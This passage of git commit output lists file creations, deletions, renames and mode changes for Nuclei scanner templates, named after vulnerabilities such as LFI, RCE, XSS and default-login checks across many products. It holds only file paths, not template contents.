(100%) rename nuclei-templates/Other/{httpbin-open-redirect.yaml => httpbin-open-redirect-8049.yaml} (100%) create mode 100644 nuclei-templates/Other/httpbin-panel-8051.yaml delete mode 100644 nuclei-templates/Other/httpbin-panel.yaml delete mode 100644 nuclei-templates/Other/httpbin-xss-8052.yaml create mode 100644 nuclei-templates/Other/httpbin-xss-8053.yaml rename nuclei-templates/Other/{httpd-config-8055.yaml => httpd-config.yaml} (100%) delete mode 100644 nuclei-templates/Other/huawei-HG532e-default-router-login.yaml create mode 100644 nuclei-templates/Other/huawei-hg255s-lfi-8060.yaml delete mode 100644 nuclei-templates/Other/huawei-hg255s-lfi.yaml create mode 100644 nuclei-templates/Other/huawei-hg532e-default-router-login-8064.yaml create mode 100644 nuclei-templates/Other/huawei-hg532e-panel-8065.yaml delete mode 100644 nuclei-templates/Other/huawei-hg532e-panel.yaml rename nuclei-templates/Other/{huawei-home-gateway-8072.yaml => huawei-home-gateway.yaml} (100%) rename nuclei-templates/Other/{huawei-router-auth-bypass-8075.yaml => huawei-router-auth-bypass.yaml} (100%) rename nuclei-templates/Other/{huayu-reporter-fileread.yaml => huayu-Reporter-fileRead.yaml} (100%) rename nuclei-templates/Other/{huayu-reporter-rce.yaml => huayu-Reporter-rce.yaml} (100%) create mode 100644 nuclei-templates/Other/hubspot-takeover-8078.yaml delete mode 100644 nuclei-templates/Other/hubspot-takeover.yaml create mode 100644 nuclei-templates/Other/hubspot.yaml delete mode 100644 nuclei-templates/Other/hue-default-credential-8080.yaml create mode 100644 nuclei-templates/Other/hue-default-credential-8081.yaml create mode 100644 nuclei-templates/Other/hue.yaml create mode 100644 nuclei-templates/Other/huijietong-cloud-fileread-8082.yaml delete mode 100644 nuclei-templates/Other/huijietong-cloud-fileread-8085.yaml create mode 100644 nuclei-templates/Other/hybris.yaml create mode 100644 nuclei-templates/Other/ibm-advanced-system-management-8090.yaml delete mode 100644 nuclei-templates/Other/ibm-advanced-system-management.yaml create mode 100644 nuclei-templates/Other/ibm-friendly-path-exposure-1.yaml rename nuclei-templates/Other/{ibm-friendly-path-exposure-8093.yaml => ibm-friendly-path-exposure-8092.yaml} (100%) delete mode 100644 nuclei-templates/Other/ibm-http-server-8097.yaml create mode 100644 nuclei-templates/Other/ibm-http-server.yaml rename nuclei-templates/Other/{ibm-infoprint-lfi.yaml => ibm-infoprint-lfi-8105.yaml} (100%) rename nuclei-templates/Other/{ibm-sterling-detect-8122.yaml => ibm-sterling-detect.yaml} (100%) rename nuclei-templates/Other/{ibm-storage-default-credential-8125.yaml => ibm-storage-default-credential-8123.yaml} (100%) rename nuclei-templates/Other/{iceflow-vpn-disclosure.yaml => iceflow-vpn-disclosure-8128.yaml} (100%) create mode 100644 nuclei-templates/Other/icewarp-webclient-rce-8131.yaml delete mode 100644 nuclei-templates/Other/icewarp-webclient-rce.yaml delete mode 100644 nuclei-templates/Other/idemia-biometrics-default-login-8139.yaml create mode 100644 nuclei-templates/Other/idemia-biometrics-default-login.yaml rename nuclei-templates/Other/{entrust-identityguard.yaml => identityguard-selfservice-entrust-8142.yaml} (100%) rename nuclei-templates/Other/{IDOR-vuln-params.yaml => idor-vuln-params(1).yaml} (100%) create mode 100644 nuclei-templates/Other/iis-internal-ip-disclosure-8148.yaml delete mode 100644 nuclei-templates/Other/iis-internal-ip-disclosure.yaml rename nuclei-templates/Other/{influxdb-detect-8159.yaml => influxdb-detect-8160.yaml} (100%) rename nuclei-templates/Other/{insecure-firebase-database.yaml => insecure-firebase-database-8161.yaml} (100%) delete mode 100644 nuclei-templates/Other/inspur-clusterengine-default-login-8162.yaml create mode 100644 nuclei-templates/Other/inspur-clusterengine-default-login.yaml create mode 100644 nuclei-templates/Other/instagram.yaml create mode 100644 nuclei-templates/Other/integrated_management_module.yaml rename nuclei-templates/Other/{intelbras-login.yaml => intelbras-login-8163.yaml} (100%) rename nuclei-templates/Other/{interactsh-server.yaml => interactsh-server-8165.yaml} (100%) rename nuclei-templates/Other/{intercom-takeover-8166.yaml => intercom-takeover-8167.yaml} (100%) rename nuclei-templates/Other/{internet-service-8177.yaml => internet-service-8178.yaml} (100%) rename nuclei-templates/Other/{iotawatt-app-exposure.yaml => iotawatt-app-exposure-8187.yaml} (100%) create mode 100644 nuclei-templates/Other/iplanet-web-server-8191.yaml delete mode 100644 nuclei-templates/Other/iplanet-web-server.yaml delete mode 100644 nuclei-templates/Other/ipstack.yaml create mode 100644 nuclei-templates/Other/iptime-default-login-8194.yaml delete mode 100644 nuclei-templates/Other/iptime-default-login.yaml rename nuclei-templates/Other/{iptime-router.yaml => iptime-router-8195.yaml} (100%) rename nuclei-templates/Other/{issuu-panel-lfi-8199.yaml => issuu-panel-lfi-8200.yaml} (100%) rename nuclei-templates/Other/{api-iterable-445.yaml => iterable.yaml} (100%) delete mode 100644 nuclei-templates/Other/itop-detect-8201.yaml create mode 100644 nuclei-templates/Other/itop-detect-8203.yaml delete mode 100644 nuclei-templates/Other/itop-panel-8205.yaml create mode 100644 nuclei-templates/Other/itop-panel.yaml delete mode 100644 nuclei-templates/Other/ixcache-panel-8206.yaml create mode 100644 nuclei-templates/Other/ixcache-panel.yaml delete mode 100644 nuclei-templates/Other/jamf-blind-xxe-8209.yaml create mode 100644 nuclei-templates/Other/jamf-blind-xxe.yaml create mode 100644 nuclei-templates/Other/jamf-panel-8216.yaml delete mode 100644 nuclei-templates/Other/jamf-panel.yaml create mode 100644 nuclei-templates/Other/jaspersoft-detect.yaml create mode 100644 nuclei-templates/Other/java-melody-exposed-1.yaml create mode 100644 nuclei-templates/Other/java-melody-exposed-2.yaml rename nuclei-templates/Other/{java-melody-exposed-8221.yaml => java-melody-exposed-8224.yaml} (100%) create mode 100644 nuclei-templates/Other/jboss-seam-debug-page-8239.yaml delete mode 100644 nuclei-templates/Other/jboss-seam-debug-page.yaml create mode 100644 nuclei-templates/Other/jbpm.yaml mode change 100755 => 100644 nuclei-templates/Other/jdbc-connection-string.yaml delete mode 100644 nuclei-templates/Other/jeecg-boot-detect-8247.yaml create mode 100644 nuclei-templates/Other/jeecg-boot-detect-8248.yaml delete mode 100644 nuclei-templates/Other/jeesite-default-login.yaml rename nuclei-templates/Other/{JEEWMS-fileRead.yaml => jeewms-fileread.yaml} (100%) rename nuclei-templates/Other/{jeewms-lfi-8254.yaml => jeewms-lfi-8255.yaml} (100%) rename nuclei-templates/Other/{jellyfin-detect.yaml => jellyfin-detect-8257.yaml} (100%) rename nuclei-templates/{CVE-2024/cve-2024-23897.yaml => Other/jenk.yaml} (100%) create mode 100644 nuclei-templates/Other/jenkins-asyncpeople-8267.yaml delete mode 100644 nuclei-templates/Other/jenkins-asyncpeople.yaml create mode 100644 nuclei-templates/Other/jenkins-default-8273.yaml delete mode 100644 nuclei-templates/Other/jenkins-default-login.yaml rename nuclei-templates/Other/{jenkins-detect.yaml => jenkins-detect-8275.yaml} (100%) rename nuclei-templates/Other/{jenkins-script-8281.yaml => jenkins-script-8284.yaml} (100%) rename nuclei-templates/Other/{jenkins-stack-trace-8287.yaml => jenkins-stack-trace-8285.yaml} (100%) rename nuclei-templates/Other/{jetbrains-datasources.yaml => jetbrains-datasources-8291.yaml} (100%) rename nuclei-templates/Other/{jfrog-8303.yaml => jfrog-8304.yaml} (100%) create mode 100644 nuclei-templates/Other/jfrog-unauth-build-exposed-8302.yaml delete mode 100644 nuclei-templates/Other/jfrog-unauth-build-exposed.yaml delete mode 100644 nuclei-templates/Other/jira-detect-8316.yaml create mode 100644 nuclei-templates/Other/jira-detect.yaml delete mode 100644 nuclei-templates/Other/jira-service-desk-signup-8320.yaml create mode 100644 nuclei-templates/Other/jira-service-desk-signup-8321.yaml delete mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards-8323.yaml create mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards.yaml create mode 100644 nuclei-templates/Other/jira-unauthenticated-popular-filters.yaml rename nuclei-templates/Other/{jira-unauthenticated-projects.yaml => jira-unauthenticated-projects-8335.yaml} (100%) rename nuclei-templates/Other/{jira-unauthenticated-screens.yaml => jira-unauthenticated-screens-8338.yaml} (100%) delete mode 100644 nuclei-templates/Other/jira-unauthenticated-user-picker.yaml create mode 100644 nuclei-templates/Other/jira_user_piker.yaml create mode 100644 nuclei-templates/Other/jitsi-meet.yaml create mode 100644 nuclei-templates/Other/jkstatus-manager-8347.yaml delete mode 100644 nuclei-templates/Other/jkstatus-manager.yaml create mode 100644 nuclei-templates/Other/jmx-default-login-8356.yaml delete mode 100644 nuclei-templates/Other/jmx-default-login.yaml create mode 100644 nuclei-templates/Other/jolokia-mbean-search-8363.yaml delete mode 100644 nuclei-templates/Other/jolokia-mbean-search.yaml create mode 100644 nuclei-templates/Other/jolokia-unauthenticated-lfi-8364.yaml delete mode 100644 nuclei-templates/Other/jolokia-unauthenticated-lfi.yaml delete mode 100644 nuclei-templates/Other/joomla-com-fabrik-lfi-8370.yaml create mode 100644 nuclei-templates/Other/joomla-com-fabrik-lfi-8373.yaml rename nuclei-templates/Other/{joomla-htaccess.yaml => joomla-htaccess-8382.yaml} (100%) delete mode 100644 nuclei-templates/Other/joomla-manifest-file-8386.yaml create mode 100644 nuclei-templates/Other/joomla-manifest-file-8387.yaml rename nuclei-templates/Other/{joomla-panel.yaml => joomla-panel-8391.yaml} (100%) create mode 100644 nuclei-templates/Other/joomla-workflow-8395.yaml delete mode 100644 nuclei-templates/Other/joomla-workflow.yaml delete mode 100644 nuclei-templates/Other/jupyter-ipython-unauth-8402.yaml create mode 100644 nuclei-templates/Other/jupyter-ipython-unauth-8405.yaml create mode 100644 nuclei-templates/Other/jupyterhub-default-login-8401.yaml delete mode 100644 nuclei-templates/Other/jupyterhub-default-login.yaml create mode 100644 nuclei-templates/Other/jwt-token-8410.yaml delete mode 100644 nuclei-templates/Other/jwt-token.yaml rename nuclei-templates/Other/{kafdrop-xss.yaml => kafdrop-xss-8411.yaml} (100%) create mode 100644 nuclei-templates/Other/kafka-center-default-login-8416.yaml delete mode 100644 nuclei-templates/Other/kafka-center-default-login.yaml rename nuclei-templates/Other/{kafka-connect-ui.yaml => kafka-connect-ui-8423.yaml} (100%) delete mode 100644 nuclei-templates/Other/kafka-cruise-control-8427.yaml create mode 100644 nuclei-templates/Other/kafka-cruise-control.yaml rename nuclei-templates/Other/{kafka-monitoring.yaml => kafka-monitoring-8431.yaml} (100%) create mode 100644 nuclei-templates/Other/kafka-topics-ui-8434.yaml delete mode 100644 nuclei-templates/Other/kafka-topics-ui.yaml create mode 100644 nuclei-templates/Other/karaf.yaml rename nuclei-templates/Other/{Karel-ip-phone-lfi.yaml => karel-ip-phone-lfi-8436.yaml} (100%) delete mode 100644 nuclei-templates/Other/kenesto-login-8445.yaml create mode 100644 nuclei-templates/Other/kenesto-login.yaml create mode 100644 nuclei-templates/Other/kentico-login-8446.yaml delete mode 100644 nuclei-templates/Other/kentico-login.yaml rename nuclei-templates/Other/{kerio-connect-client.yaml => kerio-connect-client-8452.yaml} (100%) rename nuclei-templates/Other/{kevinlab-device-detect.yaml => kevinlab-device-detect-8462.yaml} (100%) rename nuclei-templates/Other/{kevinlab-hems-backdoor.yaml => kevinlab-hems-backdoor-8465.yaml} (100%) create mode 100644 nuclei-templates/Other/keycloak-openid-config-8477.yaml delete mode 100644 nuclei-templates/Other/keycloak-openid-config.yaml create mode 100644 nuclei-templates/Other/keycloak-xss-8482.yaml create mode 100644 nuclei-templates/Other/kibana-detect-8484.yaml delete mode 100644 nuclei-templates/Other/kibana-detect.yaml create mode 100644 nuclei-templates/Other/kingdee-eas-directory-traversal-8489.yaml delete mode 100644 nuclei-templates/Other/kingdee-eas-directory-traversal.yaml create mode 100644 nuclei-templates/Other/kingsoft_antivirus.yaml rename nuclei-templates/Other/{kinsta-takeover.yaml => kinsta-takeover-8493.yaml} (100%) create mode 100644 nuclei-templates/Other/kio_firmware.yaml create mode 100644 nuclei-templates/Other/kiwi_tcms.yaml create mode 100644 nuclei-templates/Other/kiwitcms-json-rpc.yaml rename nuclei-templates/Other/{kong-detect-8500.yaml => kong-detect-8499.yaml} (100%) rename nuclei-templates/Other/{Konga-default-login.yaml => konga-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/kube-api-pods-8510.yaml delete mode 100644 nuclei-templates/Other/kube-api-pods.yaml create mode 100644 nuclei-templates/Other/kube-api-secrets-8512.yaml delete mode 100644 nuclei-templates/Other/kube-api-secrets.yaml rename nuclei-templates/Other/{kube-api-services.yaml => kube-api-services-8513.yaml} (100%) delete mode 100644 nuclei-templates/Other/kube-dashboard-detect.yaml delete mode 100644 nuclei-templates/Other/kubelet-healthz-8518.yaml create mode 100644 nuclei-templates/Other/kubelet-healthz-8519.yaml delete mode 100644 nuclei-templates/Other/kubelet-metrics-8521.yaml create mode 100644 nuclei-templates/Other/kubelet-metrics.yaml create mode 100644 nuclei-templates/Other/kubelet-pods-8522.yaml delete mode 100644 nuclei-templates/Other/kubelet-pods.yaml delete mode 100644 nuclei-templates/Other/kubernetes-api-detect.yaml create mode 100644 nuclei-templates/Other/kubernetes-enterprise-manager-8529.yaml delete mode 100644 nuclei-templates/Other/kubernetes-enterprise-manager.yaml delete mode 100644 nuclei-templates/Other/kubernetes-metrics-8536.yaml create mode 100644 nuclei-templates/Other/kubernetes-metrics.yaml create mode 100644 nuclei-templates/Other/kubernetes-pods-8542.yaml delete mode 100644 nuclei-templates/Other/kubernetes-pods-8543.yaml rename nuclei-templates/Other/{kubernetes-resource-report-8549.yaml => kubernetes-resource-report.yaml} (100%) delete mode 100644 nuclei-templates/Other/kyan-network-credentials-disclosure-8556.yaml create mode 100644 nuclei-templates/Other/kyan-network-credentials-disclosure.yaml create mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi-8558.yaml delete mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi.yaml rename nuclei-templates/Other/{lacie-panel.yaml => lacie-panel-8561.yaml} (100%) create mode 100644 nuclei-templates/Other/lancom-router-panel-8562.yaml delete mode 100644 nuclei-templates/Other/lancom-router-panel.yaml create mode 100644 nuclei-templates/Other/landfill-remote-monitoring-control.yaml create mode 100644 nuclei-templates/Other/landingi-takeover-8566.yaml delete mode 100644 nuclei-templates/Other/landingi-takeover.yaml rename nuclei-templates/Other/{landray-oa-fileread-8571.yaml => landray-oa-fileread-8569.yaml} (100%) rename nuclei-templates/Other/{lansweeper-login.yaml => lansweeper-login-8573.yaml} (100%) rename nuclei-templates/Other/{laravel-debug-enabled.yaml => laravel-debug-enabled-8577.yaml} (100%) create mode 100644 nuclei-templates/Other/laravel-env-8581.yaml delete mode 100644 nuclei-templates/Other/laravel-env.yaml delete mode 100644 nuclei-templates/Other/laravel-filemanager-8590.yaml create mode 100644 nuclei-templates/Other/laravel-filemanager-8591.yaml create mode 100644 nuclei-templates/Other/laravel-ignition-xss-8592.yaml delete mode 100644 nuclei-templates/Other/laravel-ignition-xss.yaml create mode 100644 nuclei-templates/Other/laravel-log-file-8597.yaml delete mode 100644 nuclei-templates/Other/laravel-log-file-8598.yaml create mode 100644 nuclei-templates/Other/laravel-telescope-8601.yaml delete mode 100644 nuclei-templates/Other/laravel-telescope.yaml create mode 100644 nuclei-templates/Other/lazy-file-8607.yaml delete mode 100644 nuclei-templates/Other/lazy-file.yaml create mode 100644 nuclei-templates/Other/leira-cron-jobs.yaml create mode 100644 nuclei-templates/Other/leira-roles.yaml delete mode 100644 nuclei-templates/Other/leostream-detection.yaml create mode 100644 nuclei-templates/Other/leostream-panel.yaml delete mode 100644 nuclei-templates/Other/lfi-keyed.yaml create mode 100644 nuclei-templates/Other/lfi-linux-fuzz.yaml delete mode 100644 nuclei-templates/Other/lfi.yaml create mode 100644 nuclei-templates/Other/lfr_express.yaml create mode 100644 nuclei-templates/Other/liferay-portal-detect-8625.yaml delete mode 100644 nuclei-templates/Other/liferay-portal-detect-8626.yaml create mode 100644 nuclei-templates/Other/lighttpd-default.yaml rename nuclei-templates/Other/{linkedin-id.yaml => linkedin-client-id.yaml} (100%) rename nuclei-templates/Other/{linkerd-detect-8632.yaml => linkerd-detect-8633.yaml} (100%) delete mode 100644 nuclei-templates/Other/linkerd-ssrf-detect-8637.yaml create mode 100644 nuclei-templates/Other/linkerd-ssrf-detect.yaml delete mode 100644 nuclei-templates/Other/linksys-wifi-login-8644.yaml create mode 100644 nuclei-templates/Other/linksys-wifi-login.yaml delete mode 100644 nuclei-templates/Other/linux-lfi-fuzz.yaml create mode 100644 nuclei-templates/Other/linux-lfi-fuzzing.yaml create mode 100644 nuclei-templates/Other/liveview-axis-camera-8647.yaml delete mode 100644 nuclei-templates/Other/liveview-axis-camera.yaml rename nuclei-templates/Other/{log4j-fuzz-head-poc.yaml => log4j-fuzz-head-poc-v1.yaml} (100%) delete mode 100644 nuclei-templates/Other/log4j-fuzz-head-poc-v2.yaml rename nuclei-templates/Other/{log4jshell-detect.yaml => log4j-url.yaml} (100%) create mode 100644 nuclei-templates/Other/loganalyzer.yaml rename nuclei-templates/Other/{logins (copy 1).yaml => logins.yaml} (100%) create mode 100644 nuclei-templates/Other/logstash.yaml rename nuclei-templates/Other/{api-loqate-453.yaml => loqate.yaml} (100%) delete mode 100644 nuclei-templates/Other/lotus-domino-version-8654.yaml create mode 100644 nuclei-templates/Other/lotus-domino-version.yaml create mode 100644 nuclei-templates/Other/lotuscms-rce-8653.yaml delete mode 100644 nuclei-templates/Other/lotuscms-rce.yaml create mode 100644 nuclei-templates/Other/lucas-string-replace.yaml create mode 100644 nuclei-templates/Other/lucee-login-8665.yaml delete mode 100644 nuclei-templates/Other/lucee-login.yaml create mode 100644 nuclei-templates/Other/lucee-stack-trace-8668.yaml delete mode 100644 nuclei-templates/Other/lucee-stack-trace-8669.yaml rename nuclei-templates/Other/{lutron-iot-default-login-8678.yaml => lutron-iot-default-login-8675.yaml} (100%) create mode 100644 nuclei-templates/Other/maccmsv10-backdoor-8683.yaml delete mode 100644 nuclei-templates/Other/maccmsv10-backdoor.yaml rename nuclei-templates/Other/{magento-2-exposed-api.yaml => magento-2-exposed-api-8688.yaml} (100%) delete mode 100644 nuclei-templates/Other/magento-admin-panel-8693.yaml create mode 100644 nuclei-templates/Other/magento-admin-panel.yaml rename nuclei-templates/Other/{magento-cacheleak.yaml => magento-cacheleak-8699.yaml} (100%) create mode 100644 nuclei-templates/Other/magento-config-8703.yaml delete mode 100644 nuclei-templates/Other/magento-config.yaml create mode 100644 nuclei-templates/Other/magento-unprotected-dev-files-8708.yaml delete mode 100644 nuclei-templates/Other/magento-unprotected-dev-files-8709.yaml delete mode 100644 nuclei-templates/Other/magicflow-lfi-8710.yaml create mode 100644 nuclei-templates/Other/magicflow-lfi-8713.yaml create mode 100644 nuclei-templates/Other/magnolia_cms.yaml create mode 100644 nuclei-templates/Other/mailchimp-api(1).yaml delete mode 100644 nuclei-templates/Other/mailchimp-api-key-8722.yaml create mode 100644 nuclei-templates/Other/mailchimp-api-key-8724.yaml create mode 100644 nuclei-templates/Other/mailchimp.yaml delete mode 100644 nuclei-templates/Other/mailgun-api.yaml rename nuclei-templates/Other/{manageengine-adaudit.yaml => manageengine-adaudit-8730.yaml} (100%) create mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk-8748.yaml delete mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk.yaml rename nuclei-templates/Other/{manageengine-applications-manager.yaml => manageengine-applications-manager-8753.yaml} (100%) create mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8756.yaml delete mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8757.yaml delete mode 100644 nuclei-templates/Other/manageengine-opmanager-8768.yaml create mode 100644 nuclei-templates/Other/manageengine-opmanager.yaml delete mode 100644 nuclei-templates/Other/manageengine-supportcenter-8775.yaml create mode 100644 nuclei-templates/Other/manageengine-supportcenter.yaml create mode 100644 nuclei-templates/Other/manageengine_netflow_analyzer.yaml rename nuclei-templates/Other/{mantis-detect.yaml => mantis-detect-8780.yaml} (100%) create mode 100644 nuclei-templates/Other/mantisbt-default-credential-8778.yaml rename nuclei-templates/Other/{mashery-takeover-8786.yaml => mashery-takeover-8785.yaml} (100%) rename nuclei-templates/Other/{Maticsoft-Shop-sqli.yaml => maticsoft-shop-sqli.yaml} (100%) rename nuclei-templates/Other/{mautic-crm-panel.yaml => mautic-crm-panel-8789.yaml} (100%) rename nuclei-templates/Other/{mcafee-epo-rce-8790.yaml => mcafee-epo-rce-8793.yaml} (100%) create mode 100644 nuclei-templates/Other/medium-takeover-8798.yaml delete mode 100644 nuclei-templates/Other/medium-takeover.yaml rename nuclei-templates/Other/{metabase-panel.yaml => metabase-panel-8806.yaml} (100%) create mode 100644 nuclei-templates/Other/metadata-alibaba-8808.yaml delete mode 100644 nuclei-templates/Other/metadata-alibaba.yaml rename nuclei-templates/Other/{metadata-azure.yaml => metadata-azure-8814.yaml} (100%) rename nuclei-templates/Other/{metadata-digitalocean-8817.yaml => metadata-digitalocean-8818.yaml} (100%) rename nuclei-templates/Other/{metadata-google.yaml => metadata-google-8820.yaml} (100%) delete mode 100644 nuclei-templates/Other/metadata-openstack-8826.yaml create mode 100644 nuclei-templates/Other/metadata-openstack-8828.yaml create mode 100644 nuclei-templates/Other/metadata-oracle-8831.yaml delete mode 100644 nuclei-templates/Other/metadata-oracle.yaml delete mode 100644 nuclei-templates/Other/metatag-cms-8832.yaml create mode 100644 nuclei-templates/Other/metatag-cms-8833.yaml create mode 100644 nuclei-templates/Other/metersphere-plugin-rce-8837.yaml delete mode 100644 nuclei-templates/Other/metersphere-plugin-rce.yaml create mode 100644 nuclei-templates/Other/metinfo-lfi-8840.yaml delete mode 100644 nuclei-templates/Other/metinfo-lfi.yaml delete mode 100644 nuclei-templates/Other/microsoft-echange-server-detect.yaml rename nuclei-templates/Other/{microsoft-exchange-login.yaml => microsoft-exchange-login-8846.yaml} (100%) create mode 100644 nuclei-templates/Other/microsoft-exchange-panel-8848.yaml delete mode 100644 nuclei-templates/Other/microsoft-exchange-panel.yaml create mode 100644 nuclei-templates/Other/microsoft-exchange-server-detect-8854.yaml rename nuclei-templates/Other/{microsoft-exchange-workflow.yaml => microsoft-exchange-workflow-8855.yaml} (100%) delete mode 100755 nuclei-templates/Other/microsoft-teams-webhook-8856.yaml create mode 100644 nuclei-templates/Other/microsoft-teams-webhook-8858.yaml create mode 100644 nuclei-templates/Other/microweber-detect-8862.yaml delete mode 100644 nuclei-templates/Other/microweber-detect.yaml create mode 100644 nuclei-templates/Other/mikrotik-graph-8870.yaml delete mode 100644 nuclei-templates/Other/mikrotik-graph.yaml create mode 100644 nuclei-templates/Other/minimouse-lfi-8880.yaml delete mode 100644 nuclei-templates/Other/minimouse-lfi.yaml delete mode 100644 nuclei-templates/Other/minio-browser-8882.yaml create mode 100644 nuclei-templates/Other/minio-browser-8883.yaml delete mode 100644 nuclei-templates/Other/minio-console-8886.yaml create mode 100644 nuclei-templates/Other/minio-console.yaml rename nuclei-templates/Other/{minio-default-login-8889.yaml => minio-default-login-8888.yaml} (100%) mode change 100755 => 100644 nuclei-templates/Other/minio-default-password-8891.yaml mode change 100755 => 100644 nuclei-templates/Other/minio-detect-8892.yaml delete mode 100644 nuclei-templates/Other/mirai-unknown-rce-8899.yaml create mode 100644 nuclei-templates/Other/mirai-unknown-rce.yaml delete mode 100644 nuclei-templates/Other/misconfigured-docker-8900.yaml create mode 100644 nuclei-templates/Other/misconfigured-docker.yaml create mode 100644 nuclei-templates/Other/mobileiron-log4j-jndi-rce-8905.yaml delete mode 100644 nuclei-templates/Other/mobileiron-log4j-jndi-rce.yaml rename nuclei-templates/Other/{mobotix-guest-camera.yaml => mobotix-guest-camera-8911.yaml} (100%) rename nuclei-templates/Other/{moinmoin-detect.yaml => moinmoin-detect-8916.yaml} (100%) create mode 100644 nuclei-templates/Other/mongodb-detect-8920.yaml delete mode 100644 nuclei-templates/Other/mongodb-detect.yaml create mode 100644 nuclei-templates/Other/mongodb-ops-manager-8922.yaml delete mode 100644 nuclei-templates/Other/mongodb-ops-manager.yaml delete mode 100644 nuclei-templates/Other/mongodb-unauth-8926.yaml create mode 100644 nuclei-templates/Other/mongodb-unauth.yaml delete mode 100644 nuclei-templates/Other/monitorix-exposure-8929.yaml create mode 100644 nuclei-templates/Other/monitorix-exposure-8933.yaml delete mode 100644 nuclei-templates/Other/moodle-changelog-8934.yaml create mode 100644 nuclei-templates/Other/moodle-changelog-8935.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi-8937.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8942.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8945.yaml delete mode 100644 nuclei-templates/Other/moodle-xss-8950.yaml create mode 100644 nuclei-templates/Other/moodle-xss.yaml rename nuclei-templates/Other/{signatures-10245.yaml => moodle.yaml} (100%) delete mode 100644 nuclei-templates/Other/moveit-detect.yaml create mode 100644 nuclei-templates/Other/moveit-transfer-detect.yaml delete mode 100644 nuclei-templates/Other/mrtg-detect-8959.yaml create mode 100644 nuclei-templates/Other/mrtg-detect.yaml rename nuclei-templates/Other/{ms-exchange-server-reflected-xss-8965.yaml => ms-exchange-server-reflected-xss-8962.yaml} (100%) rename nuclei-templates/Other/{msvod-sqli.yaml => msvod-sqli-8969.yaml} (100%) create mode 100644 nuclei-templates/Other/mysql-native-password-8980.yaml delete mode 100644 nuclei-templates/Other/mysql-native-password.yaml delete mode 100644 nuclei-templates/Other/nagios-default-credential-8988.yaml create mode 100644 nuclei-templates/Other/nagios-default-credential.yaml delete mode 100644 nuclei-templates/Other/nagios-default-login-8993.yaml create mode 100644 nuclei-templates/Other/nagios-default-login.yaml rename nuclei-templates/Other/{nativechurch-wp-theme-lfd-9003.yaml => nativechurch-wp-theme-lfd-8999.yaml} (100%) create mode 100644 nuclei-templates/Other/natshell-path-traversal-9005.yaml delete mode 100644 nuclei-templates/Other/natshell-path-traversal-9006.yaml create mode 100644 nuclei-templates/Other/neighborly.yaml rename nuclei-templates/Other/{neos-detect.yaml => neos-detect-9014.yaml} (100%) rename nuclei-templates/Other/{Netcore-unauth.yaml => netcore-unauth.yaml} (100%) create mode 100644 nuclei-templates/Other/netflix-conductor-ui-9023.yaml delete mode 100644 nuclei-templates/Other/netflix-conductor-ui.yaml delete mode 100644 nuclei-templates/Other/netflix-conductor-version-9024.yaml create mode 100644 nuclei-templates/Other/netflix-conductor-version.yaml create mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-1.yaml create mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-2.yaml create mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-9027.yaml delete mode 100644 nuclei-templates/Other/netgear-router-auth-bypass.yaml create mode 100644 nuclei-templates/Other/netgear-router-exposure-9031.yaml delete mode 100644 nuclei-templates/Other/netgear-router-exposure.yaml rename nuclei-templates/Other/{netgear-wnap320-rce.yaml => netgear-wnap320-rce-9032.yaml} (100%) delete mode 100644 nuclei-templates/Other/netis-info-leak-9036.yaml create mode 100644 nuclei-templates/Other/netis-info-leak.yaml rename nuclei-templates/Other/{netis-router.yaml => netis-router-9037.yaml} (100%) create mode 100644 nuclei-templates/Other/netman_204_firmware.yaml create mode 100644 nuclei-templates/Other/netrc-9045.yaml delete mode 100644 nuclei-templates/Other/netrc-9046.yaml delete mode 100644 nuclei-templates/Other/netscaler-aaa-login-9050.yaml create mode 100644 nuclei-templates/Other/netscaler-aaa-login.yaml create mode 100644 nuclei-templates/Other/netscaler-gateway-9055.yaml delete mode 100644 nuclei-templates/Other/netscaler-gateway.yaml create mode 100644 nuclei-templates/Other/netsus-server-login-9062.yaml delete mode 100644 nuclei-templates/Other/netsus-server-login.yaml rename nuclei-templates/Other/{netsweeper-open-redirect-9063.yaml => netsweeper-open-redirect-9064.yaml} (100%) create mode 100644 nuclei-templates/Other/netsweeper-webadmin-detect-9066.yaml delete mode 100644 nuclei-templates/Other/netsweeper-webadmin-detect.yaml delete mode 100644 nuclei-templates/Other/netterce.yaml create mode 100644 nuclei-templates/Other/network_security_manager.yaml create mode 100644 nuclei-templates/Other/next-gen_application_firewall.yaml rename nuclei-templates/Other/{nextcloud-detect.yaml => nextcloud-detect-9079.yaml} (100%) delete mode 100644 nuclei-templates/Other/nextcloud-install-9082.yaml create mode 100644 nuclei-templates/Other/nextcloud-install-9085.yaml create mode 100644 nuclei-templates/Other/nexus-default-login-9086.yaml delete mode 100644 nuclei-templates/Other/nexus-default-login.yaml rename nuclei-templates/Other/{nexus-detect.yaml => nexus-detect-9094.yaml} (100%) create mode 100644 nuclei-templates/Other/nginx-Detect.yaml delete mode 100644 nuclei-templates/Other/nginx-detect.yaml create mode 100644 nuclei-templates/Other/nginx-linux-page-9102.yaml delete mode 100644 nuclei-templates/Other/nginx-linux-page.yaml create mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9108.yaml delete mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9109.yaml create mode 100644 nuclei-templates/Other/nginx-proxy-manager-9111.yaml delete mode 100644 nuclei-templates/Other/nginx-proxy-manager.yaml create mode 100644 nuclei-templates/Other/nginx-version-9121.yaml delete mode 100644 nuclei-templates/Other/nginx-version.yaml rename nuclei-templates/Other/{niagara-fox-protocol-enum.yaml => niagara-fox-info-enum.yaml} (100%) create mode 100644 nuclei-templates/Other/nifi.yaml create mode 100644 nuclei-templates/Other/ninjaform-open-redirect-9133.yaml delete mode 100644 nuclei-templates/Other/ninjaform-open-redirect-9134.yaml create mode 100644 nuclei-templates/Other/node-integration-enabled-9136.yaml delete mode 100644 